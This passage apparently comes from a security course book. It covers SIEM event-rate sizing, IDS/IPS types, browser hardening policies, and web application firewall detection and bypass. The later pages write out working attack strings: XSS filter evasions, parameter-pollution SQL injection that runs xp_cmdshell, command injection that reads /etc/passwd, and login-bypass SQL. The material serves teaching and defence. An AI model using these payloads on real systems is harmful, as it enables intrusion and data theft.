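Formula 1 can be sketched in a few lines of Python. This is a minimal illustration; the function name and the sample event count are hypothetical, not part of the original worksheet.

```python
# Formula 1: EPS = (# of security events) / (time period in seconds).
# A minimal sketch; the sample numbers below are hypothetical.

def events_per_second(event_count, period_seconds):
    """Divide the total event count by the number of seconds in the sample."""
    return event_count / period_seconds

# Example: a device logged 4,320,000 security events over a 24-hour peak window.
peak_eps = events_per_second(4_320_000, 24 * 3600)
print(peak_eps)  # 50.0
```

The same function yields NE when fed a sample taken during normal activity rather than peak.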
  • 74. 246 | P a g e 1. The resulting EPS is the PE or NE, depending upon whether we began with peak or normal activity. Once we have completed this computation for every device needing security information event management, we can insert the resulting numbers in the formula below to determine Normal EPS and Peak EPS totals for a benchmark requirement. Formula 2: 1. In your production environment, determine the peak number of security events (PEx) created by each device that requires logging, using Formula 1. (If you have identical devices with identical hardware, configurations, load, traffic, etc., you may use the expression [PEx x (# of identical devices)] to avoid having to determine PE for every device.) 2. Sum all PE numbers to come up with a grand total for your environment. 3. Add at least 10% to the sum for headroom and another 10% for growth. The resulting formula looks like this: Step 1: (PE1 + PE2 + PE3 ... + (PE4 x D4) + (PE5 x D5) ...) = SUM1 [baseline PE] Step 2: SUM1 + (SUM1 x 10%) = SUM2 [adds 10% headroom] Step 3: SUM2 + (SUM2 x 10%) = Total PE benchmark requirement [adds 10% growth potential] Once these computations are complete, the resulting Peak EPS set of numbers will reflect that grand, but impractical, peak total mentioned above. Again, it is unlikely that all devices will ever simultaneously produce log events at maximum rate. Seek consultation from SMEs and the system engineers provided by the vendor in order to establish a realistic Peak EPS that the SIEM system must be able to handle, and then set filters for getting required event information through to SIEM analysis, should an overload occur. We have used these equations to evaluate a hypothetical mid-market network with a set number of devices. If readers have a similar infrastructure, similar rates may apply. If the organization is different, the benchmark can be adjusted to fit organizational infrastructures using our equations. 
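The three steps of Formula 2 can be sketched as follows. The device types and PE figures are invented for illustration; only the 10% headroom and 10% growth margins come from the text.

```python
# Formula 2 sketch: sum per-device PE (multiplying identical devices),
# then add 10% headroom (Step 2) and 10% growth (Step 3).
# All device figures below are hypothetical.

def total_pe(device_pe):
    """device_pe maps device type -> (PE per device, count of identical devices)."""
    sum1 = sum(pe * count for pe, count in device_pe.values())  # Step 1: baseline PE
    sum2 = sum1 * 1.10                                          # Step 2: +10% headroom
    return sum2 * 1.10                                          # Step 3: +10% growth

devices = {
    "firewall": (1000.0, 4),  # 4 identical firewalls at 1,000 PE each
    "ips": (500.0, 6),
    "router": (0.6, 7),
}
print(round(total_pe(devices), 2))  # 8475.08
```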
The Baseline Network A mid-sized organization is defined as having 500–1000 users, according to a December guide by Gartner, Inc., titled “Gartner’s New SMB Segmentation and Methodology.” Gartner Principal Analyst Adam Hils, together with a team of Gartner analysts, helped us determine that a 750–1000 user organization is a reasonable base point for our benchmark. As Hils puts it, this number represents some of the geographic and technical diversity found in large enterprises without being too complex to scope and benchmark. With Gartner’s advice, we set our hypothetical organization to have 750 employees, 750 user end points, five offices, six subnets, five databases, and a central data center. Each subnet will have
  • 75. 247 | P a g e an IPS, a switch and gateway/router. The data center has four firewalls and a VPN. (See the matrix below and Appendix A, “Baseline Network Device Map,” for more details.) Once the topography is defined, the next stage is to average EPS collected from these devices during normal and peak periods. Remember that demanding all log data at the highest speed 24x7 could, in itself, become problematic, causing a potential DoS situation with network or SIEM system overload. So realistic speeds based on networking and SIEM product restrictions must also be considered in the baseline. Protocols and data sources present other variables to consider when determining average and peak load requirements. In terms of effect on EPS rates, our experience is that systems using UDP can generate more events more quickly, but this creates a higher load for the management tool, which actually slows collection and correlation when compared to TCP. One of our reviewing analysts has seen UDP packets dropped at 3,000 EPS, while TCP could maintain a 100,000 EPS load. It has also been our experience that both protocols are commonly used together in a single environment. Table 1, “Baseline Network Device EPS Averages,” provides a breakdown of Average, Peak and Averaged Peak EPS for the different systems from which logs are collected. Each total below is the result of device quantity (column 1) x EPS calculated for the device. For example, 0.60 Average EPS for Cisco Gateway/Routers has already been multiplied by the quantity of 7 devices. So the EPS per single device is not displayed in the matrix, except when the quantity is 1. To calculate Average Peak EPS, we assumed two subnets under attack, with affected devices sending 80 percent of their EPS capacity to the SIEM. These numbers are by no means scientific. But they do represent research against product information (number of events devices are capable of producing), other research, and the consensus of expert SANS Analysts contributing to this paper.
  • 76. 248 | P a g e A single security incident, such as a quickly replicating worm in a subnet, may fire off thousands of events per second from the firewall, IPS, router/switch, servers, and other infrastructure at a single gateway. What if another subnet falls victim and the EPS are at peak in two subnets? Using our baseline, such a scenario with two infected subnets representing 250 infected end points could theoretically produce 8,119 EPS. We used this as our Average Peak EPS baseline because this midline number is more representative of a serious attack on an organization of this size. In this scenario, we still have event information coming from servers and applications not directly under attack, but there is potential impact to those devices. It is important, therefore, that these normal logs, which are useful in analysis and automatic or manual reaction, continue to be collected as needed.
  • 77. 249 | P a g e SIEM Storage and Analysis Now that we have said so much about EPS, it is important to note that no one ever analyzes a single second’s worth of data. An EPS rating is simply designed as a guideline to be used for evaluation, planning and comparison. When designing a SIEM system, one must also consider the volume of data that may be analyzed for a single incident. If an organization collects an average of 20,000 EPS over eight hours of an ongoing incident, that will require sorting and analysis of 576,000,000 data records. Using a 300-byte average event size, that amounts to 172.8 gigabytes of data. This consideration will help put into perspective some reporting and analysis baselines set in the table below. Remember that some incidents may last for extended periods of time, perhaps tapering off, then spiking in activity at different points during the attack. While simple event performance characteristics provide a metric against which most enterprises can judge a SIEM, as mentioned earlier, the ultimate value of a well-deployed SIEM platform will be in terms of MTTR (Mean Time To Remediate) or other metrics that can equate rapid incident response to improved business continuity and minimal operational/fiscal impact. It should be noted in this section, as well, that event storage may refer to multiple data facilities within the SIEM deployment model. There is a local event database, used to perform active investigations and forensic analysis against recent activities; long-term storage, used as an archive of summarized event information that is no longer granular enough for comprehensive forensics; and read-only, encrypted raw log storage, used to preserve the original event for forensic analysis and nonrepudiation, guaranteeing chain of custody for regulatory compliance.
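The storage arithmetic above is easy to verify:

```python
# Sanity check of the figures in the text: 20,000 EPS sustained for eight
# hours at an average event size of 300 bytes.
eps = 20_000
hours = 8
avg_event_bytes = 300

records = eps * hours * 3600          # events collected during the incident
total_bytes = records * avg_event_bytes

print(records)               # 576000000 data records
print(total_bytes / 10**9)   # 172.8 (decimal gigabytes)
```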
  • 79. 251 | P a g e Baseline Network Device Map This network map is the diagram for our sample network. Traffic flow, points for collecting and/or forwarding event data, and throttle points were all considered in setting the benchmark baseline in Table 1.
  • 80. 252 | P a g e EPS Calculation Worksheet Common SIEM Report Types 1. Security SIEM DB 2. Logger DB 3. Alarms 4. Incidents 5. Vulnerabilities 6. Availability 7. Network Statistics 8. Asset Information and Inventory 9. Ticketing system 10. Network
  • 81. 253 | P a g e Custom Reports Defining the right Rules – It’s all about the rules When it comes to a SIEM, it is all about the rules. The SIEM can be configured to be most effective and produce the best results by: 1. Defining the right rules that define “what is considered a security event/incident” 2. Implementing an automated response/mitigation action to stop it in real time 3. Configuring it to alert the right person for each incident – in real time An example of a subset of a few events, which together represent a security incident: 1. Some IP on the internet port-scans the organization’s IP range; the port scan is detected and logged 2. 10 days later, a machine from the internal network connects to that IP = Intrusion!
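The port-scan example above can be sketched as a small correlation rule. Everything here (the event interface, the 14-day window) is an assumption for illustration; real SIEM rules are written in the product's own rule language.

```python
# Sketch of the correlation rule: alert when an internal host connects out to
# an IP address that port-scanned the organization within the last N days.
from datetime import datetime, timedelta

SCAN_WINDOW = timedelta(days=14)   # correlation window (assumed)
scan_log = {}                      # scanner IP -> time of last detected scan

def on_port_scan(src_ip, when):
    """Record a detected and logged port scan."""
    scan_log[src_ip] = when

def on_outbound_connection(dst_ip, when):
    """Return True (raise an incident) if dst_ip scanned us within the window."""
    seen = scan_log.get(dst_ip)
    return seen is not None and when - seen <= SCAN_WINDOW

on_port_scan("203.0.113.7", datetime(2024, 1, 1))
print(on_outbound_connection("203.0.113.7", datetime(2024, 1, 11)))   # True  -> Intrusion!
print(on_outbound_connection("198.51.100.9", datetime(2024, 1, 11)))  # False
```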
  • 82. 254 | P a g e IDS/IPS Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about said activity, attempt to block/stop the activity, and report the activity. Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main difference is that, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent/block intrusions that are detected. More specifically, an IPS can take such actions as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address. An IPS can also correct Cyclic Redundancy Check (CRC) errors, defragment packet streams, prevent TCP sequencing issues, and clean up unwanted transport- and network-layer options.
  • 83. 255 | P a g e IPS Types 1. Network-based intrusion prevention system (NIPS): monitors the entire network for suspicious traffic by analyzing protocol activity. 2. Wireless intrusion prevention system (WIPS): monitors a wireless network for suspicious traffic by analyzing wireless networking protocols. 3. Network behavior analysis (NBA): examines network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations. 4. Host-based intrusion prevention system (HIPS): an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. Detection Methods 1. Signature-Based Detection: This method of detection utilizes signatures, which are attack patterns that are preconfigured and predetermined. A signature-based intrusion prevention system monitors the network traffic for matches to these signatures. Once a match is found the intrusion prevention system takes the appropriate action. Signatures can be exploit-based or vulnerability-based. Exploit-based signatures analyze patterns appearing in the exploits being protected against, while vulnerability-based signatures analyze vulnerabilities in a program, its execution, and the conditions needed to exploit said vulnerability. 2. Statistical anomaly-based detection: This method of detection baselines performance of average network traffic conditions. After a baseline is created, the system intermittently samples network traffic, using statistical analysis to compare the sample to the set baseline. If the activity is outside the baseline parameters, the intrusion prevention system takes the appropriate action. 3. Stateful Protocol Analysis Detection: This method identifies deviations of protocol states by comparing observed events with “predetermined profiles of generally accepted definitions of benign activity.”
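Statistical anomaly-based detection can be illustrated with a toy baseline check; the three-sigma threshold and the sample values are assumptions for illustration, not any vendor's actual behavior.

```python
# Toy statistical anomaly detection: learn a baseline from normal traffic
# samples, then flag values outside mean +/- 3 standard deviations.
from statistics import mean, stdev

def build_baseline(samples):
    mu, sigma = mean(samples), stdev(samples)
    return (mu - 3 * sigma, mu + 3 * sigma)

def is_anomalous(value, baseline):
    low, high = baseline
    return not (low <= value <= high)

normal_eps = [48, 52, 50, 49, 51, 50, 47, 53]   # hypothetical normal traffic
baseline = build_baseline(normal_eps)            # (44.0, 56.0)
print(is_anomalous(50, baseline))    # False: within the baseline
print(is_anomalous(500, baseline))   # True: the IPS takes action
```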
  • 84. 256 | P a g e Signature Catalog:
  • 85. 257 | P a g e Alert Monitoring:
  • 86. 258 | P a g e Security Reporting:
  • 87. 259 | P a g e Alert Monitor:
  • 88. 260 | P a g e Anti-Virus: Web content protection & filtering Session Hi-Jacking and Internal Network Man-In-The-Middle XSS Attack Vector The attack flow: 1. The attacker finds an XSS vulnerability in the server/website/web application 2. The attacker creates an encoded URL attack string to decrease the level of suspicion 3. The attacker spreads the link to a targeted victim or to a distribution list 4. The victim logs into the web application and clicks the link 5. The attacker’s code is executed under the victim’s credentials and sends the unique session identifier to the attacker
  • 89. 261 | P a g e 6. The attacker plants the unique session identifier in his browser and is now connected to the system as the victim The Man-In-The-Middle Attack Vector • Taking over an active session to a computer system • In order to attack the system, the attacker must know the protocol/method being used to handle the active sessions with the system • In order to attack the system, the attacker must obtain the user’s session identifier (session id, session hash, token, IP) • The most common use of session hijacking revolves around textual protocols such as HTTP, where the identifier is the ASPSESSID/PHPSESSID/JSESSION parameter located in the HTTP Cookie header, aka “The Session Cookie” • The most common session hijacking scenarios are carried out in combination with: • XSS – where the session cookie is read by the attacker’s JavaScript code • Man-In-The-Middle – where the cookie is sent over clear-text HTTP through the attacker’s machine, which becomes the victim’s gateway
  • 94. 266 | P a g e HTML5 and New Client-Side Risks Cookie/Repository User Tracking Tracking Users Using HTML5 Local Storage Feature • HTML5 provides features that allow planting persistent information on users’ computers • A tracker can be planted pre-emptively or during an identified attack • Since the information is persistent, it is possible to retrieve and inspect it at any later date, and the attacker can be identified
  • 95. 267 | P a g e Tracking Users Using HTML5 Local Storage Feature • Types of “Ever Cookies” (tracking features) • Standard HTTP Cookies • Silverlight Isolated Storage • Local Shared Objects (Flash Cookies) • Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out • Storing cookies in and reading out Web History • Storing cookies in HTTP ETags • Internet Explorer userData storage • HTML5 Session Storage • HTML5 Local Storage • HTML5 Global Storage • HTML5 Database Storage via SQLite
  • 96. 268 | P a g e User TraceBack Techniques JAVA Trackback Techniques
  • 97. 269 | P a g e MAC ADDRESS Detection Of All Network Interfaces via JAVA You can steal the user’s MAC address with Java 1.6. For Internet Explorer you can use an applet. This information is very sensitive, because the MAC address is a unique identifier. Although it can be easily changed by the user, it can be useful to identify some users with dynamic IP addresses or behind proxies.
function get_mac() {
    try {
        // Enumerate all network interfaces through the Java bridge
        var ifaces = java.net.NetworkInterface.getNetworkInterfaces();
        var ifaces_list = java.util.Collections.list(ifaces);
        for (var i = 0; i < ifaces_list.size(); i++) {
            var mac = ifaces_list.get(i).getHardwareAddress();
            if (mac) {
                return mac; // first interface with a hardware address
            }
        }
    } catch (e) { /* Java bridge unavailable */ }
    return false;
}
  • 98. 270 | P a g e XSS + Browser Location Services Browser/Smart-Phone Location Services Browser Location Services (FireFox)
  • 99. 271 | P a g e Browser Location Services (Google Chrome)
  • 100. 272 | P a g e Browser Location Services Working Behind Tor Anonymity Network
  • 101. 273 | P a g e Use your power to protect and enforce – GPO
Policy name – Policy path
Prevent Deleting Download History – Windows Components\Internet Explorer\Delete Browsing History
Disable add-on performance notifications – Windows Components\Internet Explorer
Enable alternative codecs in HTML5 media elements – Windows Components\Internet Explorer\Internet Control Panel\Advanced settings\Multimedia
Allow Internet Explorer 8 Shutdown Behavior – Windows Components\Internet Explorer
Install binaries signed by MD2 and MD4 signing technologies – Windows Components\Internet Explorer\Security Features\Binary Behavior Security Restriction
Automatically enable newly installed add-ons – Windows Components\Internet Explorer
Turn off Managing SmartScreen Filter – Windows Components\Internet Explorer
Prevent configuration of top result search in the Address bar – Windows Components\Internet Explorer\Internet Settings\Advanced settings\Searching
Prevent Deleting ActiveX Filtering and Tracking Protection data – Windows Components\Internet Explorer\Delete Browsing History
Go to an intranet site for a single word entry in the Address bar – Windows Components\Internet Explorer\Internet Settings\Advanced settings\Browsing
Show tabs below Address bar – Windows Components\Internet Explorer\Toolbars
Prevent users from bypassing SmartScreen Filter's application reputation warnings about files that are not commonly downloaded from the Internet – Windows Components\Internet Explorer
Disable Browser Geolocation – Windows Components\Internet Explorer
  • 102. 274 | P a g e
Turn off ability to pin sites – Windows Components\Internet Explorer
Turn on ActiveX Filtering – Windows Components\Internet Explorer
Configure Tracking Protection Lists – Windows Components\Internet Explorer\Privacy
Tracking Protection Threshold – Windows Components\Internet Explorer\Privacy
Turn off Tracking Protection – Windows Components\Internet Explorer\Privacy
 Prevent users from bypassing SmartScreen Filter’s application reputation warnings about files that are not commonly downloaded from the Internet  Prevent Deleting Download History
  • 103. 275 | P a g e  Install binaries signed by MD2 and MD4 signing technologies  Do not automatically enable newly installed add-ons
  • 104. 276 | P a g e  Turn off Managing SmartScreen Filter  Turn on ActiveX filtering
  • 105. 277 | P a g e  Enable alternate codecs in HTML5 media elements  Prevent Deleting ActiveX Filtering and Tracking Protection data
  • 106. 278 | P a g e  Disable Browser Geolocation (“Browser Location Services”)
  • 107. 279 | P a g e Make sure Internet Explorer Protected Mode Is Enforced:
  • 108. 280 | P a g e Choosing, Implementing and Testing Web Application Firewalls Web applications have some serious vulnerabilities, and a WAF provides a very important extra protection layer for the web solution. Hackers can find access points through errors in code, and we find that having a WAF in front of our web application is very important for security. A WAF acts as a special mechanism governing the interaction between the server and client while processing HTTP packets. It also provides a way to monitor the data as it is received from the outside. The solution is based on a set of rules that exposes whether there is an attack targeting the server. Usually, a web application firewall aims to protect large websites such as banks, online retailers, social networks and large companies, but anyone can use one now that open-source solutions are available. A WAF can be implemented in two ways, via hardware or software, and in three forms: 1. Implemented as a reverse proxy server. 2. Implemented in routing/bridge mode. 3. Integrated into the web application. Examples of the first form include mod_security, Barracuda and nevisProxy. These types of WAF automatically block or redirect the request to the web server without any changes or editing of data. The second category consists mainly of hardware WAFs, for example, Imperva SecureSphere (impervaguard.com). These solutions require additional configuration on the internal network, but this option ultimately gains in performance. Finally, the third type lives inside the web application itself, such as a WAF integrated into the CMS. WAF rules contain a blacklist (a list of unacceptable actions) and a whitelist (accepted and permitted actions). For example, a blacklist may contain strings like «UNION SELECT», «<script>» and «/etc/passwd», while whitelist rules may constrain a numeric parameter value (from 0 to 65535). 
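The blacklist/whitelist rule model can be sketched as follows. The blacklist strings and the 0–65535 whitelist range come from the text; the function itself is a simplified assumption (real WAFs normalize encodings before matching).

```python
# Minimal sketch of a WAF rule check: a blacklist of known attack substrings
# plus a whitelist constraint on numeric parameter values.
import re

BLACKLIST = ["UNION SELECT", "<script>", "/etc/passwd"]

def check_request(param_value):
    """Return True if the request should be allowed."""
    upper = param_value.upper()
    if any(bad.upper() in upper for bad in BLACKLIST):
        return False                       # blacklist hit: block
    if re.fullmatch(r"\d+", param_value):  # whitelist: numbers must be 0-65535
        return 0 <= int(param_value) <= 65535
    return True

print(check_request("1 UNION SELECT password"))  # False (blacklisted)
print(check_request("70000"))                    # False (outside whitelist range)
print(check_request("443"))                      # True
```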
Detecting Web Application Firewalls We will now look at how a pentester can detect a WAF and, more importantly, how to bypass it. Each firewall has a special way of responding that helps in identifying the type of WAF implemented (its fingerprint), for example:
  • 109. 281 | P a g e • HTTP-response cookie parameters. • Modified HTTP headers used to mask the server. • The way of responding to specially crafted data and queries. • The way of closing the connection upon unauthorized actions. For example, when we launch an attack on mod_security we get a 501 error code; WebKnight returns the code 999; Barracuda reveals itself through the cookie parameter barra_counter_session. This can certainly help in identifying the WAF, and there are scanners that can automate the operation, such as the w3af framework plug-in WAF_fingerprint and wafw00f. These tools are important for the pentesting operation. The next part will look at different techniques to bypass web application firewalls and exploit the most popular vulnerabilities. Here are several options available in wafw00f:
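The fingerprinting logic described above reduces to a lookup of tell-tale responses. The three signatures (501 for mod_security, 999 for WebKnight, the barra_counter_session cookie for Barracuda) are taken from the text; the function interface is an assumption for illustration.

```python
# Sketch of WAF fingerprinting: map distinctive response traits to products.

def fingerprint_waf(status_code, cookies):
    """Guess the WAF from an HTTP status code and a dict of response cookies."""
    if "barra_counter_session" in cookies:
        return "Barracuda"
    if status_code == 999:
        return "WebKnight"
    if status_code == 501:
        return "mod_security"
    return "unknown"

print(fingerprint_waf(999, {}))                              # WebKnight
print(fingerprint_waf(200, {"barra_counter_session": "1"}))  # Barracuda
print(fingerprint_waf(501, {}))                              # mod_security
```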
  • 110. 282 | P a g e Then I run wafw00f against the web server by giving the command: wafw00f.py http://localhost and here is the result: The tool can detect the WAF correctly.
  • 111. 283 | P a g e Bypassing Web Application Firewalls There is no single ideal system in the world, and this applies to web application firewalls (WAFs) too. While the advantages and positive features far outweigh the negatives of WAFs, one major problem is that only a limited set of action rules is allowed. The whitelist keeps expanding and requires more development effort, because it is very important to clearly establish allowed parameters. The second major problem is that sometimes WAF vendors fail to update their signature definitions, or do not develop the required security rule on time, and this can put the web server at risk of attacks. The first vulnerability is CVE-2009-1593 (http://www.security-database.com/detail.php?alert=CVE-2009-1593), which allows inserting extra characters in the JavaScript close tag to bypass the XSS protection mechanisms. An example is shown below: http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3 Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL. HTTP Parameter Pollution (HPP) HPP was first presented by two Italian security researchers, Luca Carettoni and Stefano di Paola. HPP gives an attacker the ability to submit HTTP parameters (POST, GET) with multiple input occurrences (query string, post data, cookies, etc.) of the same name. The application may react in unexpected ways and open up new avenues of server-side and client-side exploitation. The most outstanding example is a vulnerability in IIS + ModSecurity which allows SQL-injection-based attacks thanks to two behaviors: 1. IIS concatenates HTTP parameters submitted with the same name. 
For example: POST /index.aspx?a=1&a=2 HTTP/1.0 Host: www.example.com Cookie: a=5;a=6 Content-type: text/plain Content-Length: 7 Connection: close a=3&a=4 If such a request is sent to IIS/ASP.NET, the parameter a (Request.Params["a"]) is equal to 1,2,3,4,5,6. 2. ModSecurity inspects each parameter value individually, so it rejects the straightforward injection: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users However, the same query can be submitted split across repeated parameters:
  • 112. 284 | P a g e POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0 Host: www.example.com Cookie: a=*/from/*;a=*/users Content-Length: 21 a=*/name&a=password/* As a result, the database will execute the reassembled query: SELECT b, c FROM t WHERE a =-1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password /*,*/ FROM /*,*/ users XSS Cross-Site Scripting (XSS) is probably the best method for bypassing a web application firewall (WAF). This is due to JavaScript’s flexibility. At the BlackHat conference, a large number of methods to trick filters were presented. For example: object data=”javascript:alert(0)” isindex action=javascript:alert(1) type=image img src=x:alert(alt) onerror=eval(src) alt=0 x:script xmlns:x=”http://www.w3.org/1999/xhtml” alert (‘xss’); x:script Examples: 1. Profense Web Application Firewall Security Bypass Vulnerabilities Attackers can exploit the issue via a browser. The following example URIs are available: http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E 2. Finding: IBM Web Application Firewall Bypass The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web vulnerabilities that the product intends to protect against. The issue occurs when an attacker submits repeated occurrences of the same parameter.
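The parameter-concatenation behavior these bypasses rely on can be simulated offline. This is a sketch only: `parse_qs` stands in for the server's parameter handling, and the query string is illustrative; ASP/ASP.NET's Request.Params joins repeated occurrences with commas.

```python
# Simulating how ASP/ASP.NET reassembles repeated parameters: all occurrences
# of the same name are joined with commas, which is what lets an attacker
# split a SQL payload across many small, innocent-looking parameters.
from urllib.parse import parse_qs

def aspnet_param(query, name):
    """Join all occurrences of `name` with commas, like Request.Params does."""
    return ",".join(parse_qs(query).get(name, []))

qs = "id=2571&iid=-1 union&iid=select&iid=password"
print(aspnet_param(qs, "id"))   # 2571
print(aspnet_param(qs, "iid"))  # -1 union,select,password
```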
  • 113. 285 | P a g e The example shown below uses the following environment: a web environment using Microsoft IIS, ASP.NET technology and Microsoft SQL Server 2000, protected by the IBM Web Application Firewall. As expected, the following request will be identified and blocked (depending on configuration) by the IBM Web application firewall. http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell "ping 10.1.1.3" -- IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter if multiple entries are part of the request. http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell &iid= "ping 10.1.1.3" -- IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of the iid parameter; however, it will include a comma "," between them, resulting in the following output being sent to the database. '; EXEC master..xp_cmdshell , "ping 10.1.1.3" -- The request above will be identified and blocked (depending on configuration) by the IBM Web application firewall, because it appears that "EXEC" and "xp_cmdshell" trigger an attack pattern. However, it is possible to split all the spaces into multiple parameters. For example: http://sitename/find_ta_def.aspx?id=2571&iid=';&iid=EXEC&iid=master..xp_cmdshell&iid="ping 10.1.1.3" &iid= -- The above request will bypass the affected IBM Web application firewall, resulting in the following output being sent to the database. '; , EXEC , master..xp_cmdshell , "ping 10.1.1.3" , -- However, the above SQL code will not be properly executed because of the commas inserted in the SQL query; to solve this, we will use SQL comments. http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ --
  • 114. 286 | P a g e The above request will bypass the IBM Web application firewall, resulting in the following output being sent to the database, which is valid and working SQL code. '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ -- The above code will execute the ping command on the Microsoft Windows backend, assuming the application was running with administrative privileges. This attack class is also sometimes referenced as HTTP Pollution Attack, HTTP Parameter Pollution (HPP) or HTTP Parameter Concatenation. The exploitability of this issue depends on the infrastructure technology being used (web server, development framework, etc.). Circumvention of default WAF filtering mechanisms The following section discusses possibilities to circumvent the default filtering mechanisms of the tested web application firewalls. The Perl script for an automated evaluation of filtering mechanisms developed during this project (see section 4.2) tests the filtering capabilities by trying to exploit previously known and implemented vulnerabilities. As attacks against web applications can typically be conducted using a variety of different means (character encoding, usage of different keywords or functions, obfuscation using comments, etc.), the very same attacks can be conducted by a number of differently assembled requests. As web application firewalls typically operate using a blacklist approach and allow all requests that do not match the blacklists, attacks can to some extent be obfuscated to pass the filtering engines. All attacks that have been marked as blocked by the automated Perl script have been analysed manually to determine the effectiveness of the filtering procedures in connection with that specific test case. As not all test cases can be covered here and the possibilities for circumvention are partly the same, the following chapter gives an overview of the circumvention options found. 
Please note that the bypass of filtering mechanisms is often demonstrated in connection with a particular web application firewall product. The fact that an issue is shown using one product as an example does not mean that products of other vendors are not also susceptible to the same circumvention technique. In connection with test case 601 (command execution), the Hyperguard web application firewall does not allow printing the contents of the /etc directory (e.g. cat /etc/passwd). The restriction is limited to this directory only. On the other hand, an attacker can enumerate all the server content using the ls command and can also read files, using the cat command, that the user www-data has access to and that are not in the /etc directory. Blocking access to /etc surely
  • 115. 287 | P a g e lowers the impact of an attack as several configuration files cannot be easily read, but does not protect other system resources in other directories that can also be used to gather information or sensitive data. Another example for incompletely implemented regular expressions for filtering is the easy bypass of the cross-site scripting filter mechanism of Hyperguard. In the following listing only the first line is blocked. All other requests are not blocked by the web application firewall and therefore enable an attacker to include arbitrary script code: < script > alert (1) </ script > < script + abc > alert (1) </ script + abc > < script > alert (1) </ script > < SCRIPT > alert ( String . fromCharCode (88 ,83 ,83) ) </ SCRIPT > The following example regarding the BIG-IP web application firewall shows clearly that a blacklist-based approach in some cases cannot effectively protect a web application infrastructure. An attack may be slowed down or less experienced attackers using standard exploit mechanisms may be kept off, but the defense is nevertheless insufficient. The following demonstration is related to test case 601 (command execution), where an attacker is able to inject arbitrary commands that are executed with the privileges of the web server. The affected script enables users to ping hosts by entering an IP address. The given IP address is then passed to the command line tool ping and the results are echoed back to the user. A normal invocation of the according PHP script looks like follows: 46Figure 2: Command execution via environment variables obfuscation. 1 cmd_exec . php ? ip =4.2.2.1 If an attacker tries to append additional commands to the parameter, the web application firewall blocks the request. The following request is for example blocked because the whoami command matches one of the built-in blacklist filters: 1 cmd_exec . php ? 
ip=4.2.2.1;whoami

In order to circumvent the filter it is possible to make use of the fact that the Apache web server by default runs with the privileges of an ordinary user (www-data), which has access to technical resources and capabilities like other users or processes. That means that the web server process also has access to environment variables that can be read and written. An attacker can use this fact to write the command to be executed, in parts, to environment variables and execute them afterwards. The following listing shows how the command whoami is split into two parts, written to environment variables and used for command execution:

4.2.2.1;a=who;b=ami;$a$b
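The effect of this splitting can be reproduced locally; the sketch below (assuming a POSIX sh and an available whoami binary) shows that the reassembled command yields the same output as the literal one, while the payload itself never contains the blacklisted string:

```python
import subprocess

# The blacklist matches the literal string "whoami", but the shell
# reassembles it from shell variables only at execution time.
payload = "a=who; b=ami; $a$b"   # what the attacker appends after the IP address

direct = subprocess.run(["sh", "-c", "whoami"], capture_output=True, text=True)
split = subprocess.run(["sh", "-c", payload], capture_output=True, text=True)

assert "whoami" not in payload        # nothing for the filter to match
assert split.stdout == direct.stdout  # yet the same command runs
```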
As the request does not match any blacklist filters, it is passed to the web server, where the command is executed (see figure 2). The same methodology (using environment variables) can be used to bypass the aforementioned restricted access to the /etc directory of the Hyperguard web application firewall. Whereas the first access attempt in the following listing is denied, the second one succeeds and reveals the contents of the system's password file:

4.2.2.1;cat /etc/passwd
4.2.2.1;a=etc;cat /$a/passwd

Test case 702 (mysqlinjection get) offers a login form which is vulnerable to SQL injection attacks. To bypass the login an attacker needs to inject SQL syntax in order to instruct the database to return a valid user even if the passwords do not match. The Hyperguard web application firewall blocks requests where injected SQL syntax is recognized. The filter can however be bypassed by entering comment characters that are not interpreted by the database but circumvent the blacklist filter. In the following listing the first request is blocked by the web application firewall, but the second one is forwarded to the web server, enabling an attacker to log in as userA without knowledge of the corresponding password:

userA' or 1=1/*
userA'/**/or 1=1/*

Another problem as far as this test case is concerned occurs in connection with the ModSecurity web application firewall, where the default ruleset can also be bypassed. The attack makes use of a syntax issue in connection with the MySQL database. Whereas other databases require explicit comparisons (e.g. or 1=1) to construct a true statement, MySQL also accepts the following statements as true:

or 1
or TRUE
or version()
or sin(1)
...
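A naive comparison-matching rule of the kind bypassed by the comment trick above can be sketched as follows (the regular expression is an assumption for illustration, not the vendor's actual rule):

```python
import re

# Hypothetical blacklist rule: a quote followed by whitespace and "or n=n".
# SQL comments (/**/) can stand in for the whitespace, so the rule misses them.
sqli_rule = re.compile(r"'\s+or\s+\d+\s*=\s*\d+", re.IGNORECASE)

blocked = "userA' or 1=1/*"
bypass = "userA'/**/or 1=1/*"

assert sqli_rule.search(blocked) is not None   # caught by the filter
assert sqli_rule.search(bypass) is None        # comment replaces the space: missed
```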
Whereas the first request in the following listing is blocked (ModSecurity detects the SQL syntax because of the single quote in connection with the equality sign), the other requests are passed on to the web server and are successfully processed by the database. The blacklist filter is bypassed because of the missing comparison.

userA' or 1=1#
userA' or 1#
userA'+' '/*

